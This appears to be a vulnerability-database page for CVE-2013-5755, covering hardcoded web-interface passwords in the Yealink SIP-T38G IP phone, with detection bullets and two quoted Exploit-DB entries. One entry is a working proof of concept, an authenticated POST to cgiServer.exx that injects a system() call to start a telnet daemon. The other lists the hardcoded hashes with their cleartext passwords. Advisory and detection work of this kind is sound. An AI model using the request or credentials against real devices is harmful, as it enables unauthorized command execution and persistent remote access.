CVE-2013-5755
published 2014-07-16CVE-2013-5755: config/.htpasswd in Yealink IP Phone SIP-T38G has a hardcoded password of (1) user (s7C9Cx.rLsWFA) for the user account, (2) admin (uoCbM.VEiKQto) for the…
PriorityP260critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
4.34%
90.0th percentile
config/.htpasswd in Yealink IP Phone SIP-T38G has a hardcoded password of (1) user (s7C9Cx.rLsWFA) for the user account, (2) admin (uoCbM.VEiKQto) for the admin account, and (3) var (jhl3iZAe./qXM) for the var account, which makes it easier for remote attackers to obtain access via unspecified vectors.
Detection & IOCsextracted from sources · hover to see the quote
- →Detect POST requests to /cgi-bin/cgiServer.exx, particularly with a body containing OS command injection via the system() function ↗
- →Alert on use of the hardcoded Base64 Basic Auth header 'YWRtaW46YWRtaW4=' (admin:admin) in HTTP requests to Yealink SIP-T38G devices ↗
- →Monitor for telnetd activation commands on Yealink SIP-T38G devices, indicating post-exploitation persistence via busybox telnet daemon ↗
- →Flag HTTP requests to /config/.htpasswd on Yealink SIP-T38G devices, as this file contains hardcoded credential hashes ↗
- ·Three hardcoded accounts exist in /config/.htpasswd with known cleartext passwords: user:user, admin:admin, var:var — all trivially guessable and cannot be changed without firmware modification ↗
- ·The hardcoded credentials are present in the .htpasswd file as fixed hashes and protect the web management interface; exploitation does not require any prior knowledge beyond these published values ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Yealink VoIP Phone SIP-T38G - Remote Command Execution
exploitdb·2014-06-13·CVSS 10.0
CVE-2013-5759 [CRITICAL] Yealink VoIP Phone SIP-T38G - Remote Command Execution
Yealink VoIP Phone SIP-T38G - Remote Command Execution
---
Title: Yealink VoIP Phone SIP-T38G Remote Command Execution
Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team
Vendor Homepage: http://www.yealink.com/Companyprofile.aspx
Version: VoIP Phone SIP-T38G
CVE: CVE-2013-5758
Description:
Using cgiServer.exx we are able to send OS command using the system
function.
POC:
POST /cgi-bin/cgiServer.exx HTTP/1.1
Host: 10.0.75.122
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4= (Default Creds CVE-2013-5755)
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
system("/bin/busybox%20telnetd%20start")
--
*Mr.Un1k0d3r** or 1 #*
Exploit-DB
Yealink VoIP Phone SIP-T38G - Default Credentials
exploitdb·2014-06-13·CVSS 10.0
CVE-2013-5755 [CRITICAL] Yealink VoIP Phone SIP-T38G - Default Credentials
Yealink VoIP Phone SIP-T38G - Default Credentials
---
Title: Yealink VoIP Phone SIP-T38G Default Credentials
Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team
Vendor Homepage: http://www.yealink.com/Companyprofile.aspx
Version: VoIP Phone SIP-T38G
CVE: CVE-2013-5755
Description:
Web interface use hardcoded default credential in /config/.htpasswd
user:s7C9Cx.rLsWFA admin:uoCbM.VEiKQto var:jhl3iZAe./qXM
Here's the cleartext password for these accounts:
user:user
admin:admin
var:var
--
*Mr.Un1k0d3r** or 1 #*
No writeups or analysis indexed.
2014-07-16
Published